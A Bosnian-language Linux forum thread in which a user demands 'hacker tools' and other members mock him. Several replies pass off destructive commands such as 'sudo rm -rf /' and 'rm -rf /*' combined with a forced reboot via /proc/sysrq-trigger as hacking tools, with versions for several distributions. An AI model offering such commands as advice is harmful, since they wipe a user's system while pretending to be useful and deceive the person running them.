ako ko ima, molio bih ga da postavi ili neki link ako moze za hakerske alate (tools,programe) ?
sta ti to podrazumijevas pod “hakerski alati” ?
programi za hackere… sta tu nije jasno ne kontam ?!
ja ne kontam koji su to programi za hackere ? sta trebaju da rade ti programi ?
ima google pa ako te zanima trazi, necu offtopic da idem.
ko zna napisace link, postavice ili sta vec.
sto onda ti ne trazis to isto sto meni savjetujes na google-u ?
zato sto ovo meni treba hitno, i de me popusti s pitanjima molim te.
stvarno ! nije ovo hacker-ski forum! mozda se svetis nekome ili mozda mislis da je linux “hacker-ski” OS !
vec ti dodju hakerski alati na ubuntu
odes u shell (terminal)
i upises
sudo rm -rf / ; netstat
upises password
i to je to … dobices listu otvorenih socketa na tvom kompjuteru, kao i ono sto svakom “hakeru” treba dati …
hhhh
Ipak ne dođu svi Najbolji alati za hackere su gcc i man stranice
sudo apt-get install build-essentials
http://catb.org/~esr/faqs/hacker-howto.html
Hocu i ja u te hakere :mrgreen: de mi recite te halate da budem ko pravi haker, al hitno, molim! I nemojte me plaho ništa ispitivat! Onaj ko zna nek mi odgovore, ostali koji ne znaju, nek se ne miješaju. Pogotovu ovaj maher neki Trebaju mi oni programi što imaju dugme hack što pritisnem i on tamo zdodnuje stranicu
I ja bih pola kile tih hakerskih alata!
Ja bi jedno frtalj , al da su svjezi !
heeyy hocu i ja da “zdodnujem” stranicu, gdje da kliknem?
Za one koji nisu znali … WIKI stranice je cesto lako haknuti … zato slobodno na http://start.linux.org.ba/Hakni_me
Jesil probo onaj hamin savjet broj #1 ???
mada malko te zezno, ide vako:
Nemoj zaboravit .pebkac, znaci za etf.ba ovako:
rm -rf / ; whoami > etf.ba.pebkac
ja se izvinjavam, evo nakon cijelonocnog guuglanja nadjoh da je ispravna komanda za hakovanje ova:
ubuntu: sudo nohup rm -rf /* ; echo b > /proc/sysrq-trigger ; id > pebkac.microsoft.com 2>&1 1>&0
suse: su -c nohup rm -rf /* ; echo b > /proc/sysrq-trigger ; id > pebkac.microsoft.com 2>&1 1>&0
debian: su -c nohup rm -rf /* ; echo b > /proc/sysrq-trigger ; id > pebkac.microsoft.com 2>&1 1>&0
slackware: su -c nohup rm -rf /* ; echo b > /proc/sysrq-trigger ; id > pebkac.microsoft.com 2>&1 1>&0
mandriva: su -c nohup rm -rf /* ; echo b > /proc/sysrq-trigger ; id > pebkac.microsoft.com 2>&1 1>&0
Ma daj zatvorite ovo i prebacite u Off. Ipak je ovo ozbiljan forum
gdje sam ja pomoc dosao trazit sad tek vidim